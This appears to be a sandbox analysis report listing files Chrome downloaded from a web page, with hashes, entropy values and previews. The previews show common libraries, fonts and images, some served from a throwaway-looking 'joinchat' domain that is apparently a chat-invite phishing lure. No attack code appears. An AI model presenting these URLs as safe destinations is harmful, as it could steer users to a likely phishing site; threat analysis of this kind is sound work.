                          Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (32058)
                          Category:downloaded
                          Size (bytes):86659
                          Entropy (8bit):5.36781915816204
                          Encrypted:false
                          SSDEEP:1536:YNhEyjjTikEJO4edXXe9J578go6MWX2xkj8e4c4j2ll2AckaXEP6n15HZ+FhFcQ7:uxc2yjx4j2uX/kcQDU8Cu9
                          MD5:C9F5AEECA3AD37BF2AA006139B935F0A
                          SHA1:1055018C28AB41087EF9CCEFE411606893DABEA2
                          SHA-256:87083882CC6015984EB0411A99D3981817F5DC5C90BA24F0940420C5548D82DE
                          SHA-512:DCFF2B5C2B8625D3593A7531FF4DDCD633939CC9F7ACFEB79C18A9E6038FDAA99487960075502F159D44F902D965B0B5AED32B41BFA66A1DC07D85B5D5152B58
                          Malicious:false
                          Reputation:low
                          URL:https://cdn.jsdelivr.net/gh/jquery/jquery@3.2.1/dist/jquery.min.js
                          Preview:/*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):1173
                          Entropy (8bit):5.398802276822449
                          Encrypted:false
                          SSDEEP:24:lPI0OY7awgYjI0OY7awgpSRVc+u/rI0OY7awgjwy96DGSSf7:W0OEan50OEanpSRVc+uE0OEanjN0oD
                          MD5:DCA03E092D85F27F48F83D096DBDB68F
                          SHA1:2817D459756CE786CC5115BB987B7A7EC6592C66
                          SHA-256:6B612CAA1BD1DCC14F020904E76BC3CF6C08DF860D9E365F8BEEBCEFEDEA4707
                          SHA-512:D1526DAD84868AF5C8ED280E69BF725427EAA144DD066E2A01C5EB2B6278B7763CEEACC0BB12749C94766255C30F11484AC3BB8B87669C15138EBE1D01725C23
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.googleapis.com/css2?family=Yantramanav&display=swap
                          Preview:/* devanagari */.@font-face {. font-family: 'Yantramanav';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/yantramanav/v13/flU8Rqu5zY00QEpyWJYWN5fyXeZhCQ.woff2) format('woff2');. unicode-range: U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;.}./* latin-ext */.@font-face {. font-family: 'Yantramanav';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/yantramanav/v13/flU8Rqu5zY00QEpyWJYWN5f9XeZhCQ.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Yantramanav';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/yantramanav/v13/flU8Rqu5zY00QEpyWJYWN5fzXeY.woff2) format('woff2');. unicode-range: U+0000-00
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65536), with no line terminators
                          Category:downloaded
                          Size (bytes):68311
                          Entropy (8bit):4.756171637544234
                          Encrypted:false
                          SSDEEP:768:eKvcqyF7I4rb84WLMWKvcqyF7I4rb84WLMg:k/MLMc/MLMg
                          MD5:7DA92CD266069217C0F8EB0098C5193D
                          SHA1:A77355F299EF7098A8599B591EECE56246FD603C
                          SHA-256:6DAF416F915E77243B8B68BAADA9EAE0FFF34CFFB447300F114757C9B488A704
                          SHA-512:A95E61A6C856E7B10FA63B0B4D247A5200E0317510663C414832E001A8D603DABDE762830A0B076B32D2EA51998D0AB9E88B29502E28F123B2FDF453C087DF7A
                          Malicious:false
                          Reputation:low
                          URL:https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css
                          Preview:@font-face{font-family:Material-Design-Iconic-Font;src:url(../fonts/Material-Design-Iconic-Font.woff2?v=2.1.0) format('woff2'),url(../fonts/Material-Design-Iconic-Font.woff?v=2.1.0) format('woff'),url(../fonts/Material-Design-Iconic-Font.ttf?v=2.1.0) format('truetype')}.zmdi{display:inline-block;font:normal normal normal 14px/1 'Material-Design-Iconic-Font';font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.zmdi-hc-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.zmdi-hc-2x{font-size:2em}.zmdi-hc-3x{font-size:3em}.zmdi-hc-4x{font-size:4em}.zmdi-hc-5x{font-size:5em}.zmdi-hc-fw{width:1.28571429em;text-align:center}.zmdi-hc-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.zmdi-hc-ul>li{position:relative}.zmdi-hc-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.zmdi-hc-li.zmdi-hc-lg{left:-1.85714286em}.zmdi-hc-border{padding:.1em .25em;border:solid .1em #9e9
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):14
                          Entropy (8bit):3.3787834934861767
                          Encrypted:false
                          SSDEEP:3:eRbn:eRbn
                          MD5:3BE7B8B182CCD96E48989B4E57311193
                          SHA1:78FB38F212FA49029AFF24C669A39648D9B4E68B
                          SHA-256:D5558CD419C8D46BDC958064CB97F963D1EA793866414C025906EC15033512ED
                          SHA-512:F3781CBB4E9E190DF38C3FE7FA80BA69BF6F9DBAFB158E0426DD4604F2F1BA794450679005A38D0F9F1DAD0696E2F22B8B086B2D7D08A0F99BB4FD3B0F7ED5D8
                          Malicious:false
                          Reputation:low
                          URL:https://rawcdn.githack.com/AlexHostX/protect/a64076479559076b6e31356a0fb6188d291204ce/watermark.css
                          Preview:404: Not Found
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):14
                          Entropy (8bit):3.3787834934861767
                          Encrypted:false
                          SSDEEP:3:eRbn:eRbn
                          MD5:3BE7B8B182CCD96E48989B4E57311193
                          SHA1:78FB38F212FA49029AFF24C669A39648D9B4E68B
                          SHA-256:D5558CD419C8D46BDC958064CB97F963D1EA793866414C025906EC15033512ED
                          SHA-512:F3781CBB4E9E190DF38C3FE7FA80BA69BF6F9DBAFB158E0426DD4604F2F1BA794450679005A38D0F9F1DAD0696E2F22B8B086B2D7D08A0F99BB4FD3B0F7ED5D8
                          Malicious:false
                          Reputation:low
                          URL:https://rawcdn.githack.com/AlexHostX/all.asset/38984972fb20a70d711e86ac3e6f19e60ea8adc3/AlexHostWA.ttf
                          Preview:404: Not Found
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 550x999, components 3
                          Category:dropped
                          Size (bytes):224922
                          Entropy (8bit):7.971970036916137
                          Encrypted:false
                          SSDEEP:6144:+YV8ui6WevNLSqgpsCQX1UQO/PUr1MkZ7g53:+Si6WeTgaCE1p2eiDl
                          MD5:F9CEBF245B82051CF1E25A5C190DE77D
                          SHA1:40B1B150968508DFD34D94A69FEB9F5E7EB653BF
                          SHA-256:A7C76505EFE4DA19696E3365B1A211614D3A0D80ABEA92539D316EA2DF2CCEA3
                          SHA-512:D558ECE041EB399717C21EF577761482AC11BBE1FE089134B3426E1C5C35E4BFA887CBDF0C2BD500A49AF25A9B47B1DC0A61EC49A76404422DB459343C9A2C36
                          Malicious:false
                          Reputation:low
                          Preview:......Exif..II*.................Ducky.......d.....-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:683CFD180E8E11E6BFD6B766CF55E710" xmpMM:DocumentID="xmp.did:683CFD190E8E11E6BFD6B766CF55E710"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:683CFD160E8E11E6BFD6B766CF55E710" stRef:documentID="xmp.did:683CFD170E8E11E6BFD6B766CF55E710"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                          Category:downloaded
                          Size (bytes):9874
                          Entropy (8bit):7.956774071425398
                          Encrypted:false
                          SSDEEP:192:YXd6fxU78B4YlBrU8TyrJRThRmO9OW5PJkROR1M8REv3:YXd6uwB4ytMjTh/vOaMZ3
                          MD5:A1E1651FC23C15C4FE1280DE12BD0572
                          SHA1:25244E74BA666DE3B78B45F6FAAA041F7310404A
                          SHA-256:CA61910A66CBB3E5C7A154588E73EB9ECEC3447F6562F7425563B1C79A243ACC
                          SHA-512:97B010B33C4BB60F35DFE7462CB2C3C27ADA245B19737E0D6F97F1B78A644A84D72638E32DD7F74E127ED84F13E44D520FD3BF1716A435A881CA33BF362D6409
                          Malicious:false
                          Reputation:low
                          URL:https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/bahan1.jpg
                          Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........-...------------------------------------------+-------..........."........................................N.........................!..1A.Qa."2qr.....5BSs.....#$%3RTbc.....t..4...CDd..........................................................!1..AQa."q2B.......R............?....dl..v..PPN-5..[.R1G.+......z.1...c..=U..l...w....-...c..a=.i.....$..x.c..k"u..j......f.I..^...`...../.{....#.*.U7.B..S.+y.o0.2.z........d.......(...8..F.......g{...3.#.+..|..x.3.X.....3..Y_@F.J..u7....^n..o.F..P..k./g4.v^..bO<......._M(.....U......pp"....F..v-...9.MC^.........s..M..f.>.z....f1....... ..(...b.....$\.(k....^?....m..^.....4..t..h.../...L^.>.yX...,v....?..K.]n:..g.@c../..W..o+...H../r...m..I....VU.H.{h.P...~..#..Gr.V.m.`.>+....Q........E.G.N.x....+.Q.=.."...qQ...#u......|tq.?......+..E.Vu.x#A.....'D...=.G...#.>H..B?6.q..?.....b../....U..w..6.{:......R...x..6.$...
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 15744, version 1.0
                          Category:downloaded
                          Size (bytes):15744
                          Entropy (8bit):7.986588355476176
                          Encrypted:false
                          SSDEEP:384:z1TLklSElcS5V6qQTMUP07JwirW6RlLwK79/:p7EJ5E2bJwi5jLwK79/
                          MD5:15D9F621C3BD1599F0169DCF0BD5E63E
                          SHA1:7CA9C5967F3BB8BFFEAB24B639B49C1E7D03FA52
                          SHA-256:F6734F8177112C0839B961F96D813FCB189D81B60E96C33278C1983B6F419615
                          SHA-512:D35A47162FC160CD5F806C3BB7FEB50EC96FDFC81753660EAD22EF33F89BE6B1BFD63D1135F6B479D35C2E9D30F2360FFC8819EFCA672270E230635BCB206C82
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2
                          Preview:wOF2......=........t..=..........................d..d..^.`.. .T..<.....|..{........6.$.... ..t. ..I.3.%.....8..&....4Z.|t .8.........D...$.uNE.P.E.Ak...=.x.9Xz.`.I..R....#F+B`..}.RP|E...Z\.W[.............C...QB....m...cm.?.F.g.......Q....3......p...L2.[......!+@U..^~.......D.?.......j...U...c..U.l.6{...m.CD].h.t.....Q8.....@P...L.c.....+...ZD..2.K...:..4{g..:..~....v......<..H^.R.'....8....?.;...uy.VW..8=.".F..*.....@E....c....=..Ib.....y8$.a){.......KiIW.&..~.}..1..w.M..{.4......!..{..F.H.5#K...t..5.w...ve;. '......NJ......'(%;...?...D...M.Cq,<.=?.f......._...V..bA.(..37..v....+.uY.C.b.w8AF..3.n.-..'..U%.2....o.l."...^bj..aoF.!`....A....j...'.:Z.u...[..p.GW:U%.Ejq...:I...C........S.C...sJe.6D...<.UM,..&h..z}.y|..9...D..j...n..B.$..T....?../.Q..=B...C._.f.#.:Bo.@]T.(..v..F..+d...". ......R..R..R....!..~A....X............>!`p..,08. 9.../.....r..Q.......Qpg.\ko...C..3..Y.y..t'.d9..>#|..3..?.#..$....i........g5.z....S....{3..Sp..S2..w.6........
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 38812, version 1.0
                          Category:downloaded
                          Size (bytes):38812
                          Entropy (8bit):7.993456187091619
                          Encrypted:true
                          SSDEEP:768:IlehK+isKfKPJS7xGfaNtLsZFhHrek9MMzEVUrJdyWI1TrF5olqKP6PJ:+ehv5FPM7x5Bsl1NzE4JdyjclqH
                          MD5:3A7CBC4317A2F33F497608A07E633F7C
                          SHA1:5004B9E9405FE487B7CC55D3AB271AC70B3DD18B
                          SHA-256:8DE03245050E0FB0C9EB37D8D5525985B04711C40A53C3FCF55C3F07A9042559
                          SHA-512:44CFBF17042161690E15F4062315B5D52DDF5556E2A23AF853D8B918F7C4C20313A5906EFC9131995D173D6D3AD05F1171A43CFD1FE51DA5F3E85FFFE57B6506
                          Malicious:false
                          Reputation:low
                          URL:https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.0
                          Preview:wOF2...................:........................?FFTM....`..B..........P..2.6.$..*..X.. ..p..8..[.Cq..y..1.....Vq....Am.....^...............BFl..?x.._.*.*A...%...Mu.....).4\BMq....zC...tP.]5...e.j.L....c`..w}......A"..c.1..L. .AQ@....1I...y...:^9.}..B.....Y.4iM-..|....^s....r...>..eJ....0...o........5..........k..bV.2..O+...%.J7.*.N.<.k.|..g.`.....m\*.D]..M....y.-...q.9..6.G.....-..(.xi..ng....d2..........c....{.........9RK.r...e..eXZw...%..yS.y....M7[.e.....m....Os.E,..e......}V...v.dq...V..rV.f~t..d..l..l.......6s./fgIMT...a2.L}.......z.//.........E...#.,6w. .yH..<..X._.c..W..b..$...I.y.....U38h\.-.EB....3c.:...%.&...S...|0..}E.<.z..&...x'....oX..O.X|3.D.....Y0.[.UC76...9......vZ6.!H."f..<.f&n.......d.(.d).r.v..I......I..O.2.#.52X..]....F.k.e.Mr.`H.!.$...l.!..7......a..t'y...m.3.Ra....d.#/&...x.o.H.O.......7Q.L..:.........,...r\...&.O,f...;..z.w..88..<. " .2@..a......cd..L...9...<h.=)z.d.|....}.r....~...*>.@..IV..).n.,......P.y.;.*.l..^..
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 222x227, components 3
                          Category:downloaded
                          Size (bytes):6920
                          Entropy (8bit):7.937752972166402
                          Encrypted:false
                          SSDEEP:192:kg/yjRwqp63ubp8mO2XAFACr0GL6Pgg5KTwm/R+lOCl:kgqjRF2cOBA/Kd+F
                          MD5:A7A3968E74A38985B2DC9347DDFFE907
                          SHA1:ED69402173EE27C31D49B731E977D6CBB816EEA8
                          SHA-256:6821868BBE4FEC91E3BD8980C88381CDFD0B68C6B9B4FA5B69FB26EEDCE139D3
                          SHA-512:38E125681FA6B7E9EB8124B30AAE5F77E7B85C9B68C989AF5467F02CA335EB405FEF273DC7CB0E74829F7160E5373E71E9482F61EDBAC4DBFAC8358575A0174E
                          Malicious:false
                          Reputation:low
                          URL:https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/01.jpg
                          Preview:......JFIF..................................................!.%..+...&8&+/1555.$;@;3?.451...........4!.!11414414444144144414444444444444444414441@4?4144:1..........."........................................@........................!1.AQ."aq..2....BRr..b....#$3.....Ccs................................#......................!.1."A2Q.aq............?...g6U!..K)..]u.'.P.b.k.P/....../..j.UA....46.6p.Ys-.t.....>7.0._h5......jw..%..3.>.............+.7.:s)z@.3l.....O.[w...............B8u..s|}oY.w.:....3o..#.x.;cM>..m...=f.1...2...#.....MY.E!.3.P5S..w.?.......l...6.8.z.G%Q...,._.....G..d..t.]-....3>#......-.g...%Bia,.....)./.>3.q.Y....M..O..+c.}.....q...+.....>..T..P....63..}.T..PB.......W.A\..R.zm...y..XQL(..k....).'...h.E.2.91.......B.2.E.HspFR.E...n.%.R.....P..fL&.......,..75....2.......a...Y..K..r%M...+..S..lw...K.kHD....|H|....@..7>.o..|M..U@..%.|...K.W..y...1l...\.k/.#[x....)S<..~(W1..s..K..s....~..-8n..O...gsp-ap-;.0..5...$~.y:f..4v...A8O...2....,.Ua... ......Zt..
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 15860, version 1.0
                          Category:downloaded
                          Size (bytes):15860
                          Entropy (8bit):7.988022700476719
                          Encrypted:false
                          SSDEEP:384:S7qmPTF4N21t//YW2FS6+1XxrsbGmjlAbvqMmtCN:S621tHY4xwbGmjloSM7N
                          MD5:E9F5AAF547F165386CD313B995DDDD8E
                          SHA1:ACDEF5603C2387B0E5BFFD744B679A24A8BC1968
                          SHA-256:F5AEBDFEA35D1E7656EF4ACC5DB1F243209755AE3300943EF8FC6280F363C860
                          SHA-512:2A71EDB5490F286642A874D52A1969F54282BC43CB24E8D5A297E13B320321FB7B7AF5524EAC609CF5F95EE08D5E4EC5803E2A3C8D13C09F6CC38713C665D0CE
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                          Preview:wOF2......=...........=..........................d.....^.`.. .H..<........8........6.$.... ..~. ..)..~E......6..J..`.. :.....8.;..5......!.l.j.%SX.SDm...RXh...&.X......5..._...............@...8...Gi..g.;9..'.Q......1..5.U.....w.+.hn..........c.....5.#{..%.#.JP*..i.J..U(.6.D5V.<"Ex6"...k..[..{.?.d2....{.........*W.......S...hT,.l..'.9.;[@..._.L..|+...)......S...9F......T..t...-=X.:FtZ..uZ.[.?..f<.....@.....'...I...e..........8.?..-R.3,%X...I2|.Wk{i...V2C....H$.H.LH.{.........(...6U..%W[t.R....j.........iS..%..L....rf.=..7..9i.I...1.Mj..C..u.B.........vJ.....+.u$.=..3..T..R.._.gs...6).$.-.PUH..Hl....WDd.......fK.(B.F1>..5.._[..]}VA#X...c.....%.(s50...m...^...1...'.$U*H.t...H...s.AZu...'...8.p...@.@.....q..Y.#.....#.....G.....G@..o8. A........:.........S.:..N.S.j.....tav.}.9h..s.....he.......{,~k...,eK.z}.......5%G...l.uCK.....V..............m.....U}.Sz..Z.c.{.....:..g......>h..'|Z........a....^.b...o.>...g........f../w'....Ja.o(
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 550x999, components 3
                          Category:downloaded
                          Size (bytes):224922
                          Entropy (8bit):7.971970036916137
                          Encrypted:false
                          SSDEEP:6144:+YV8ui6WevNLSqgpsCQX1UQO/PUr1MkZ7g53:+Si6WeTgaCE1p2eiDl
                          MD5:F9CEBF245B82051CF1E25A5C190DE77D
                          SHA1:40B1B150968508DFD34D94A69FEB9F5E7EB653BF
                          SHA-256:A7C76505EFE4DA19696E3365B1A211614D3A0D80ABEA92539D316EA2DF2CCEA3
                          SHA-512:D558ECE041EB399717C21EF577761482AC11BBE1FE089134B3426E1C5C35E4BFA887CBDF0C2BD500A49AF25A9B47B1DC0A61EC49A76404422DB459343C9A2C36
                          Malicious:false
                          Reputation:low
                          URL:https://cloud.githubusercontent.com/assets/398893/15136779/4e765036-1639-11e6-9201-67e728e86f39.jpg
                          Preview:......Exif..II*.................Ducky.......d.....-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:683CFD180E8E11E6BFD6B766CF55E710" xmpMM:DocumentID="xmp.did:683CFD190E8E11E6BFD6B766CF55E710"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:683CFD160E8E11E6BFD6B766CF55E710" stRef:documentID="xmp.did:683CFD170E8E11E6BFD6B766CF55E710"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 1652 x 411, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):31218
                          Entropy (8bit):7.878866206491101
                          Encrypted:false
                          SSDEEP:768:k4LmuFUPCIX9Eb/snrfAptV1t4IGZm3wMwy:JiPbXWkfApth4xAAMx
                          MD5:5AE3B6BC1EBDE6C97F1CF4EFF5C0F61F
                          SHA1:AC60FB3FC5F5A96D30F133F1D60FF116AC329B86
                          SHA-256:FEDA321BB681DC8593F1CC761778FE3B2BA6447399D3A152CF3C65917DF6B147
                          SHA-512:E5B473AC0C3ACB9CDA5CF18D3B3D1452539D5BA785C91E09AC1CC6D770F1482A47D7692EAE368E21E03861DD4ABA4C1A0A3FB50F357C80AF8D5699D1F932D270
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR...t..........J~.... cHRM..z%..............u0...`..:....o._.F....pHYs...............yxIDATx^....-Uy....(X.Q...(b.{oX.`.[...aK...jT....[.X...X...(*....r..w...p.y.g?..3.f...~.Z.$o^=g..u....u.6.$I.$I.$IR.....$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.6_.n].U2.....%.#......[D.n.3#.......>..9'.....i.I.$I.$I....:.r..^..".....hd..E.-#..:.i..-.."..\._,.=.....K...F~.9.....IM+I.$u.gd....\.i..{.IN.7.&I.$...W....B.2M....5...n.qRif.t....m#.(P..s..E.~...w....GX..j..#'D~..~..$I...^../..kxN.5r....v....s.J......=I.$..N.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):6542
                          Entropy (8bit):5.396347276510722
                          Encrypted:false
                          SSDEEP:192:pNa5N4NXNO3qNWNIXNENFQNDN8NW3XNtNGqN+lNn1NhN6ND3eNhNzTNM:vafWdMQcMCFe5Kkdjjwn73Az03FM
                          MD5:E0FD6BE3182DD641E1FF9568A94E74A5
                          SHA1:0A1567A992D1A58E530A6A52AA82DAE0A4F48C57
                          SHA-256:BDB7D822D6AFD1C8354749A111F68D56CE5E5DB03B8A3028698ACFC78358E06D
                          SHA-512:2BB56FA556688262F4F99DC67905342041FCCF570CF2E9AEBC54929FDAF39B954479E75034B3BE288024E382A1BEB93C8E0CB76E8623AEF38CA947E8B9F13470
                          Malicious:false
                          Reputation:low
                          URL:"https://fonts.googleapis.com/css?family=Roboto:400,700,300"
                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2) format('woff2');. unicode-ra
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 804x513, components 3
                          Category:downloaded
                          Size (bytes):57874
                          Entropy (8bit):7.975542173199343
                          Encrypted:false
                          SSDEEP:1536:jC6XpYXIso32o6GAsaxzrQWwkLEdGhwt4Q74:jNpYYsoGwgzj3isl
                          MD5:0CFE479BEBB16F8D62355C3E33AA69B4
                          SHA1:2A919EE1D0F3071B566997254F31D068E8E2C702
                          SHA-256:5EAC082FEC3AC211C7F039372142D2A0C9C9CB78A01C004FCF22695949C635FD
                          SHA-512:B71AA9F46818CD4D270CE4E1FF5AC3D10AED69DEAB1F170FD2FC031B2BE3BCEF908C0C8F91C41ADF3E562D7294CEA78C9A7DE845266CE1C33DCEEAC28C60B79A
                          Malicious:false
                          Reputation:low
                          URL:https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/maria.jpg
                          Preview:......JFIF.............C..............................................!........."$".$.......C.........................................................................$.."................................................................................QY..&i1...A.u'._.._gtLW5..8P.s.h^\...V... ..$&...Y...3.h..-~/?5.....^ .....X...l.<.6..-....dd4..Wp.'WLV..*...%...H.=.....y.PU....U.F.Zk.`c.h...*.K.....>j.!...k..t."..av.."Z.k......F.F...p...Uc..9._.......dQ6,..hjT...Z<..y.....*.2El....#...(......v...W....F?....?"..>C...b...I..'_..la.Df..QS.o..RY...B.......XEZ.RT..........z;hpu..i.e.X....~U.-.....Z>.i....l.R..a.Vw...(...E.Z..bIVZ#S....G.C. 5.^NG.........[7"<..U...\Ka.......9Zp."GeT....m......Er/..l.#y.hUR...Q..#Q!...fzG..bgEK..<....}+YL.....X[^FW ..Mm....l).f.Yc]:g.(y...&7..N....)I..._.....=.m*...(..$FI..h..2..[N}..J.oS..j....>.....jh...?.A;.......D..s<..<...}>...-+'@..(.).%.....cI..*c..y.....&Zww#.........-.......L....\Mo......8..I...N.o3.'.m..O_n.K.g.w..2
